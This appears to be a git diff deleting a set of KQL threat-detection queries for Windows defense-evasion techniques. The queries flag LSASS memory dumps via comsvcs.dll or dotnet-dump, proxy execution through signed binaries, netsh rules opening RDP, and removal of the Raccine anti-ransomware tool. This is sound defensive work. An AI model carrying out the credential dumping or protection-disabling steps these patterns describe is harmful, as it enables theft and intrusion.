-// Author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/02/18
-// Level: high
-// Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
-// Tags: attack.defense_evasion, attack.credential_access, attack.t1036, attack.t1003.001, car.2013-05-009
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") and ((ProcessCommandLine contains "#-" or ProcessCommandLine contains "#+" or ProcessCommandLine contains "#24" or ProcessCommandLine contains "24 " or ProcessCommandLine contains "MiniDump") and (ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))) or ((ProcessCommandLine contains " #" or ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #") and (ProcessCommandLine contains "24" and ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))
\ No newline at end of file
diff --git a/Defense Evasion/Process_Memory_Dump_Via_Dotnet-Dump.kql b/Defense Evasion/Process_Memory_Dump_Via_Dotnet-Dump.kql
deleted file mode 100644
index fddf31d9..00000000
--- a/Defense Evasion/Process_Memory_Dump_Via_Dotnet-Dump.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/14
-// Level: medium
-// Description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "collect" and (FolderPath endswith "\\dotnet-dump.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-dump.dll")
\ No newline at end of file
diff --git a/Defense Evasion/Process_Proxy_Execution_Via_Squirrel.EXE.kql b/Defense Evasion/Process_Proxy_Execution_Via_Squirrel.EXE.kql
deleted file mode 100644
index 864ecfca..00000000
--- a/Defense Evasion/Process_Proxy_Execution_Via_Squirrel.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
-// Date: 2022/06/09
-// Level: medium
-// Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--processStartAndWait" or ProcessCommandLine contains "--createShortcut") and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")) and (not(((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Discord\\Update.exe" and ProcessCommandLine contains " --processStart" and ProcessCommandLine contains "Discord.exe") or ((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStartAndWait") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\GitHubDesktop\\Update.exe" and ProcessCommandLine contains "GitHubDesktop.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and ProcessCommandLine contains "Teams.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\yammerdesktop\\Update.exe" and ProcessCommandLine contains "Yammer.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Proxy_Execution_Via_Explorer.exe.kql b/Defense Evasion/Proxy_Execution_Via_Explorer.exe.kql
deleted file mode 100644
index fa762cf8..00000000
--- a/Defense Evasion/Proxy_Execution_Via_Explorer.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
-// Date: 2020/10/05
-// Level: low
-// Description: Attackers can use explorer.exe for evading defense mechanisms
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "explorer.exe" and FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\cmd.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Proxy_Execution_Via_Wuauclt.EXE.kql b/Defense Evasion/Proxy_Execution_Via_Wuauclt.EXE.kql
deleted file mode 100644
index ef5df7d2..00000000
--- a/Defense Evasion/Proxy_Execution_Via_Wuauclt.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team
-// Date: 2020/10/12
-// Level: high
-// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "UpdateDeploymentProvider" and ProcessCommandLine contains "RunHandlerComServer") and (FolderPath endswith "\\wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "wuauclt.exe")) and (not((ProcessCommandLine contains " /UpdateDeploymentProvider UpdateDeploymentProvider.dll " or (ProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or ProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (ProcessCommandLine contains ":\\Windows\\WinSxS\\" and ProcessCommandLine contains "\\UpdateDeploy.dll /ClassId ") or ProcessCommandLine contains " wuaueng.dll ")))
\ No newline at end of file
diff --git a/Defense Evasion/Publisher_Attachment_File_Dropped_In_Suspicious_Location.kql b/Defense Evasion/Publisher_Attachment_File_Dropped_In_Suspicious_Location.kql
deleted file mode 100644
index bf82b08d..00000000
--- a/Defense Evasion/Publisher_Attachment_File_Dropped_In_Suspicious_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: medium
-// Description: Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and FolderPath endswith ".pub"
\ No newline at end of file
diff --git a/Defense Evasion/Pubprn.vbs_Proxy_Execution.kql b/Defense Evasion/Pubprn.vbs_Proxy_Execution.kql
deleted file mode 100644
index 2654053b..00000000
--- a/Defense Evasion/Pubprn.vbs_Proxy_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/28
-// Level: medium
-// Description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.
-// Tags: attack.defense_evasion, attack.t1216.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\pubprn.vbs" and ProcessCommandLine contains "script:"
\ No newline at end of file
diff --git a/Defense Evasion/Python_Image_Load_By_Non-Python_Process.kql b/Defense Evasion/Python_Image_Load_By_Non-Python_Process.kql
deleted file mode 100644
index 68a7e400..00000000
--- a/Defense Evasion/Python_Image_Load_By_Non-Python_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Patrick St. John, OTR (Open Threat Research)
-// Date: 2020/05/03
-// Level: medium
-// Description: Detects the image load of "Python Core" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe.
-// Tags: attack.defense_evasion, attack.t1027.002
-DeviceImageLoadEvents
-| where InitiatingProcessVersionInfoFileDescription =~ "Python Core" and (not((InitiatingProcessFolderPath contains "Python" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Anaconda3\\")))) and (not(isnull(InitiatingProcessFolderPath)))
\ No newline at end of file
diff --git a/Defense Evasion/RDP_Connection_Allowed_Via_Netsh.EXE.kql b/Defense Evasion/RDP_Connection_Allowed_Via_Netsh.EXE.kql
deleted file mode 100644
index 642d1a2c..00000000
--- a/Defense Evasion/RDP_Connection_Allowed_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sander Wiebing
-// Date: 2020/05/23
-// Level: high
-// Description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware
-// Tags: attack.defense_evasion, attack.t1562.004
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "portopening" or ProcessCommandLine contains "allow") and (ProcessCommandLine contains "firewall " and ProcessCommandLine contains "add " and ProcessCommandLine contains "tcp " and ProcessCommandLine contains "3389")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/RDP_File_Creation_From_Suspicious_Application.kql b/Defense Evasion/RDP_File_Creation_From_Suspicious_Application.kql
deleted file mode 100644
index 42662a16..00000000
--- a/Defense Evasion/RDP_File_Creation_From_Suspicious_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/18
-// Level: high
-// Description: Detects Rclone config file being created
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleaner Browser\\Application\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\Google\\Chrome\\Application\\chrome.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\Opera.exe" or InitiatingProcessFolderPath endswith "\\Vivaldi.exe" or InitiatingProcessFolderPath endswith "\\Whale.exe" or InitiatingProcessFolderPath endswith "\\Outlook.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\Thunderbird.exe" or InitiatingProcessFolderPath endswith "\\Discord.exe" or InitiatingProcessFolderPath endswith "\\Keybase.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\Slack.exe" or InitiatingProcessFolderPath endswith "\\teams.exe") and FolderPath contains ".rdp"
\ No newline at end of file
diff --git a/Defense Evasion/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql b/Defense Evasion/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
deleted file mode 100644
index 85c02aac..00000000
--- a/Defense Evasion/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community
-// Date: 2019/01/29
-// Level: high
-// Description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
-// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090
-DeviceProcessEvents
-| where (ProcessCommandLine contains " i" and ProcessCommandLine contains " p" and ProcessCommandLine contains "=3389" and ProcessCommandLine contains " c") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/RDP_Sensitive_Settings_Changed.kql b/Defense Evasion/RDP_Sensitive_Settings_Changed.kql
deleted file mode 100644
index 7dbac35c..00000000
--- a/Defense Evasion/RDP_Sensitive_Settings_Changed.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
-// Date: 2022/08/06
-// Level: high
-// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
-Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc
-
-// Tags: attack.defense_evasion, attack.persistence, attack.t1112
-DeviceRegistryEvents
-| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)", "DWORD (0x00000003)", "DWORD (0x00000004)")) and (RegistryKey contains "\\Control\\Terminal Server" or RegistryKey contains "\\Windows NT\\Terminal Services") and RegistryKey endswith "\\Shadow") or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Control\\Terminal Server" or RegistryKey contains "\\Windows NT\\Terminal Services") and (RegistryKey endswith "\\DisableRemoteDesktopAntiAlias" or RegistryKey endswith "\\DisableSecuritySettings" or RegistryKey endswith "\\fAllowUnsolicited" or RegistryKey endswith "\\fAllowUnsolicitedFullControl")) or (RegistryKey contains "\\Control\\Terminal Server\\InitialProgram" or RegistryKey contains "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\services\\TermService\\Parameters\\ServiceDll" or RegistryKey contains "\\Windows NT\\Terminal Services\\InitialProgram")
\ No newline at end of file
diff --git a/Defense Evasion/RDP_Sensitive_Settings_Changed_to_Zero.kql b/Defense Evasion/RDP_Sensitive_Settings_Changed_to_Zero.kql
deleted file mode 100644
index a60a95e8..00000000
--- a/Defense Evasion/RDP_Sensitive_Settings_Changed_to_Zero.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
-// Date: 2022/09/29
-// Level: medium
-// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
-Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
-
-// Tags: attack.defense_evasion, attack.persistence, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\fDenyTSConnections" or RegistryKey endswith "\\fSingleSessionPerUser" or RegistryKey endswith "\\UserAuthentication")
\ No newline at end of file
diff --git a/Defense Evasion/REGISTER_APP.VBS_Proxy_Execution.kql b/Defense Evasion/REGISTER_APP.VBS_Proxy_Execution.kql
deleted file mode 100644
index faa83823..00000000
--- a/Defense Evasion/REGISTER_APP.VBS_Proxy_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\register_app.vbs" and ProcessCommandLine contains "-register"
\ No newline at end of file
diff --git a/Defense Evasion/Raccine_Uninstall.kql b/Defense Evasion/Raccine_Uninstall.kql
deleted file mode 100644
index 49b64825..00000000
--- a/Defense Evasion/Raccine_Uninstall.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/01/21
-// Level: high
-// Description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "taskkill " and ProcessCommandLine contains "RaccineSettings.exe") or (ProcessCommandLine contains "reg.exe" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "Raccine Tray") or (ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "/DELETE" and ProcessCommandLine contains "Raccine Rules Updater")
\ No newline at end of file
diff --git a/Defense Evasion/RedMimicry_Winnti_Playbook_Registry_Manipulation.kql b/Defense Evasion/RedMimicry_Winnti_Playbook_Registry_Manipulation.kql
deleted file mode 100644
index dd92ad7b..00000000
--- a/Defense Evasion/RedMimicry_Winnti_Playbook_Registry_Manipulation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Alexander Rausch
-// Date: 2020/06/24
-// Level: high
-// Description: Detects actions caused by the RedMimicry Winnti playbook
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey contains "HKLM\\SOFTWARE\\Microsoft\\HTMLHelp\\data"
\ No newline at end of file
diff --git a/Defense Evasion/RegAsm.EXE_Initiating_Network_Connection_To_Public_IP.kql b/Defense Evasion/RegAsm.EXE_Initiating_Network_Connection_To_Public_IP.kql
deleted file mode 100644
index 0e6d6555..00000000
--- a/Defense Evasion/RegAsm.EXE_Initiating_Network_Connection_To_Public_IP.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2024/04/25
-// Level: medium
-// Description: Detects "RegAsm.exe" initiating a network connection to public IP adresses
-// Tags: attack.defense_evasion, attack.t1218.009
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\regasm.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/Defense Evasion/Reg_Add_Suspicious_Paths.kql b/Defense Evasion/Reg_Add_Suspicious_Paths.kql
deleted file mode 100644
index 60b1ec1c..00000000
--- a/Defense Evasion/Reg_Add_Suspicious_Paths.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: high
-// Description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys
-// Tags: attack.defense_evasion, attack.t1112, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\AppDataLow\\Software\\Microsoft\\" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\OOBE" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon" or ProcessCommandLine contains "\\CurrentControlSet\\Control\\SecurityProviders\\WDigest" or ProcessCommandLine contains "\\Microsoft\\Windows Defender\\") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Registry_Explorer_Policy_Modification.kql b/Defense Evasion/Registry_Explorer_Policy_Modification.kql
deleted file mode 100644
index 99eafa71..00000000
--- a/Defense Evasion/Registry_Explorer_Policy_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/03/18
-// Level: medium
-// Description: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileMenu" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskbar" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoPropertiesMyDocuments" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoTrayContextMenu")
\ No newline at end of file
diff --git a/Defense Evasion/Registry_Hide_Function_from_User.kql b/Defense Evasion/Registry_Hide_Function_from_User.kql
deleted file mode 100644
index 3bb44e14..00000000
--- a/Defense Evasion/Registry_Hide_Function_from_User.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/03/18
-// Level: medium
-// Description: Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowInfoTip" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowCompColor")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideClock" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAHealth" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCANetwork" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAPower" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAVolume"))
\ No newline at end of file
diff --git a/Defense Evasion/Registry_Modification_Via_Regini.EXE.kql b/Defense Evasion/Registry_Modification_Via_Regini.EXE.kql
deleted file mode 100644
index 9a184d08..00000000
--- a/Defense Evasion/Registry_Modification_Via_Regini.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Eli Salem, Sander Wiebing, oscd.community
-// Date: 2020/10/08
-// Level: low
-// Description: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.
-// Tags: attack.t1112, attack.defense_evasion
-DeviceProcessEvents
-| where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and (not(ProcessCommandLine matches regex ":[^ \\\\]"))
\ No newline at end of file
diff --git a/Defense Evasion/Registry_Persistence_via_Service_in_Safe_Mode.kql b/Defense Evasion/Registry_Persistence_via_Service_in_Safe_Mode.kql
deleted file mode 100644
index 2709a976..00000000
--- a/Defense Evasion/Registry_Persistence_via_Service_in_Safe_Mode.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/04
-// Level: high
-// Description: Detects the modification of the registry to allow a driver or service to persist in Safe Mode.
-// Tags: attack.defense_evasion, attack.t1564.001
-DeviceRegistryEvents
-| where (RegistryValueData =~ "Service" and (RegistryKey contains "\\Control\\SafeBoot\\Minimal" or RegistryKey contains "\\Control\\SafeBoot\\Network") and RegistryKey endswith "\\(Default)") and (not((InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\SAVService\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\SAVService\\(Default)"))))
\ No newline at end of file
diff --git a/Defense Evasion/Regsvr32_DLL_Execution_With_Suspicious_File_Extension.kql b/Defense Evasion/Regsvr32_DLL_Execution_With_Suspicious_File_Extension.kql
deleted file mode 100644
index d1cd996f..00000000
--- a/Defense Evasion/Regsvr32_DLL_Execution_With_Suspicious_File_Extension.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), frack113
-// Date: 2021/11/29
-// Level: high
-// Description: Detects the execution of REGSVR32.exe with DLL files masquerading as other files
-// Tags: attack.defense_evasion, attack.t1218.010
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".bin" or ProcessCommandLine endswith ".bmp" or ProcessCommandLine endswith ".cr2" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".eps" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".ico" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpg" or ProcessCommandLine endswith ".nef" or ProcessCommandLine endswith ".orf" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".raw" or ProcessCommandLine endswith ".sr2" or ProcessCommandLine endswith ".temp" or ProcessCommandLine endswith ".tif" or ProcessCommandLine endswith ".tiff" or ProcessCommandLine endswith ".tmp" or ProcessCommandLine endswith ".rtf" or ProcessCommandLine endswith ".txt") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql b/Defense Evasion/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql
deleted file mode 100644
index e8f1f303..00000000
--- a/Defense Evasion/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/07/17
-// Level: medium
-// Description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension.
-// Tags: attack.defense_evasion, attack.t1574, attack.execution
-DeviceProcessEvents
-| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine contains ".ax" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".ocx") or isnull(ProcessCommandLine)))) and (not((ProcessCommandLine contains ".bav" or ProcessCommandLine contains ".ppl")))
\ No newline at end of file
diff --git a/Defense Evasion/Regsvr32_Execution_From_Highly_Suspicious_Location.kql b/Defense Evasion/Regsvr32_Execution_From_Highly_Suspicious_Location.kql
deleted file mode 100644
index 887d6512..00000000
--- a/Defense Evasion/Regsvr32_Execution_From_Highly_Suspicious_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/26
-// Level: high
-// Description: Detects execution of regsvr32 where the DLL is located in a highly suspicious locations
-// Tags: attack.defense_evasion, attack.t1218.010
-DeviceProcessEvents
-| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains "\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains "\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\Tasks\\" or ProcessCommandLine contains "\\Windows\\Tracing\\") or ((ProcessCommandLine contains " \"C:\\" or ProcessCommandLine contains " C:\\" or ProcessCommandLine contains " 'C:\\" or ProcessCommandLine contains "D:\\") and (not((ProcessCommandLine contains "C:\\Program Files (x86)\\" or ProcessCommandLine contains "C:\\Program Files\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains " C:\\Windows\\"
or ProcessCommandLine contains " \"C:\\Windows\\" or ProcessCommandLine contains " 'C:\\Windows\\"))))) and (not((ProcessCommandLine =~ "" or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/Defense Evasion/Regsvr32_Execution_From_Potential_Suspicious_Location.kql b/Defense Evasion/Regsvr32_Execution_From_Potential_Suspicious_Location.kql
deleted file mode 100644
index 734cedc4..00000000
--- a/Defense Evasion/Regsvr32_Execution_From_Potential_Suspicious_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/26
-// Level: medium
-// Description: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.
-// Tags: attack.defense_evasion, attack.t1218.010
-DeviceProcessEvents
-| where (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/RemoteFXvGPUDisablement_Abuse_Via_AtomicTestHarnesses.kql b/Defense Evasion/RemoteFXvGPUDisablement_Abuse_Via_AtomicTestHarnesses.kql
